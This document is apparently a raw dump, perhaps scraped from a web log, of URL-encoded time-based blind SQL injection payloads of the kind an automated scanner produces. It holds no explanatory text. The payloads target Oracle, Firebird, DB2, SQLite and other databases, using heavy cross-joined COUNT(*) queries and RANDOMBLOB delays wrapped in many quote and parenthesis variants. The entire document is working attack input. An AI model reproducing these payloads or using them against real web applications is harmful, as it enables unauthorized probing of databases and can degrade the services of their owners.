-9701%00%27%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27Ddhd%27%3D%27Ddhd -9873%27%29%20WHERE%203066%3D3066%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -5509%22%29%20WHERE%209572%3D9572%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -8533%29%20WHERE%207625%3D7625%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -4863%27%20WHERE%203235%3D3235%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -7718%22%20WHERE%203506%3D3506%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -2948%20WHERE%207688%3D7688%20OR%202064%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -1439%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -2694%27%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -9248%27%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -4330%22%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -7791%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%282627%3D2627 -7258%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%287704%3D7704 -6239%29%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%287591%3D7591 -5031%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -7835%27%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27dvEh%27%3D%27dvEh -6626%27%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27oumw%27%3D%27oumw -6586%27%29%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27rcOs%27%3D%27rcOs -9184%27%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27IrII%27%3D%27IrII -2043%27%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27sjOz%27%20LIKE%20%27sjOz -3407%27%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27ixuv%27%20LIKE%20%27ixuv -6985%27%29%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27uUGt%27%20LIKE%20%27uUGt -9683%27%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27Yykw%27%20LIKE%20%27Yykw -9262%22%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22cvQO%22%3D%22cvQO -4891%22%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22wjUh%22%3D%22wjUh -5683%22%29%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22pNDv%22%3D%22pNDv -9949%22%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22BOrX%22%3D%22BOrX -9752%22%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22LeTK%22%20LIKE%20%22LeTK -2281%22%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22EtDh%22%20LIKE%20%22EtDh -9585%22%29%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22GifO%22%20LIKE%20%22GifO -6991%22%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22pNKB%22%20LIKE%20%22pNKB -7020%25%27%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27%25%27%3D%27 -7309%25%27%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27%25%27%3D%27 -9034%25%27%29%29%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -5679%25%27%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27%25%27%3D%27 -6508%00%27%29%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27fgWT%27%3D%27fgWT -5478%00%27%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27kQcH%27%3D%27kQcH -3875%27%29%20WHERE%208718%3D8718%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -1966%22%29%20WHERE%205679%3D5679%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -7312%29%20WHERE%201473%3D1473%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -7455%27%20WHERE%206936%3D6936%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -8813%22%20WHERE%205757%3D5757%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -2303%20WHERE%201151%3D1151%20OR%205802%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -4415%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -5819%27%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -1138%27%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -8396%22%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -4574%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%287554%3D7554 -3661%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%287400%3D7400 -2729%29%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%285590%3D5590 -1042%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -4077%27%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27dePY%27%3D%27dePY -1039%27%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27lZsV%27%3D%27lZsV -6444%27%29%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27vNcG%27%3D%27vNcG -5916%27%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27BLNV%27%3D%27BLNV -4947%27%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27fkCj%27%20LIKE%20%27fkCj -5448%27%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27bcoY%27%20LIKE%20%27bcoY -3289%27%29%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27iFlX%27%20LIKE%20%27iFlX -3491%27%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27txxC%27%20LIKE%20%27txxC -6513%22%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22doKP%22%3D%22doKP -7597%22%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22CzUI%22%3D%22CzUI -4778%22%29%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22qUHP%22%3D%22qUHP -9274%22%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22pOTo%22%3D%22pOTo -9767%22%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22kCJi%22%20LIKE%20%22kCJi -5882%22%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22KyZO%22%20LIKE%20%22KyZO -9157%22%29%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22BJyv%22%20LIKE%20%22BJyv -5082%22%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22Hnzo%22%20LIKE%20%22Hnzo -2586%25%27%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27%25%27%3D%27 -6637%25%27%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27%25%27%3D%27 -5722%25%27%29%29%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27%25%27%3D%27 -2707%25%27%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27%25%27%3D%27 -1179%00%27%29%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27BIZt%27%3D%27BIZt -4326%00%27%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27ZQgw%27%3D%27ZQgw -1199%27%29%20WHERE%204190%3D4190%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -4783%22%29%20WHERE%206598%3D6598%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -3099%29%20WHERE%202496%3D2496%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -1356%27%20WHERE%206069%3D6069%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -5806%22%20WHERE%201298%3D1298%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -3940%20WHERE%208911%3D8911%20OR%208855%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -8081%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -5381%27%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -4975%27%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -3429%22%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -1085%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%282174%3D2174 -6641%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%286450%3D6450 -1188%29%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%287722%3D7722 -6720%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -2842%27%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27pKOj%27%3D%27pKOj -1778%27%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27xQID%27%3D%27xQID -2195%27%29%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27Wbjs%27%3D%27Wbjs -1242%27%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27UOej%27%3D%27UOej -1578%27%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27dCsU%27%20LIKE%20%27dCsU -2129%27%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27vcmB%27%20LIKE%20%27vcmB -9637%27%29%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27RZKm%27%20LIKE%20%27RZKm -9539%27%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27JChl%27%20LIKE%20%27JChl -7007%22%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22hDyr%22%3D%22hDyr -5675%22%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22SiLG%22%3D%22SiLG -2913%22%29%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22gppV%22%3D%22gppV -3218%22%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22lliJ%22%3D%22lliJ -6973%22%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22imzh%22%20LIKE%20%22imzh -9891%22%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22Znkq%22%20LIKE%20%22Znkq -4099%22%29%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22uLdo%22%20LIKE%20%22uLdo -2408%22%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22BGdd%22%20LIKE%20%22BGdd -1211%25%27%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 -6514%25%27%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 -2875%25%27%29%29%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 -5081%25%27%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 -9637%00%27%29%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27psAD%27%3D%27psAD -7004%00%27%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27lKIJ%27%3D%27lKIJ -7791%27%29%20WHERE%206160%3D6160%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -5016%22%29%20WHERE%202728%3D2728%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -4752%29%20WHERE%202854%3D2854%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -4462%27%20WHERE%203027%3D3027%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -5150%22%20WHERE%205446%3D5446%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -6671%20WHERE%208585%3D8585%20OR%206050%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -4376%29%20OR%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -5332%27%29%20OR%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -6796%27%20OR%204351%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 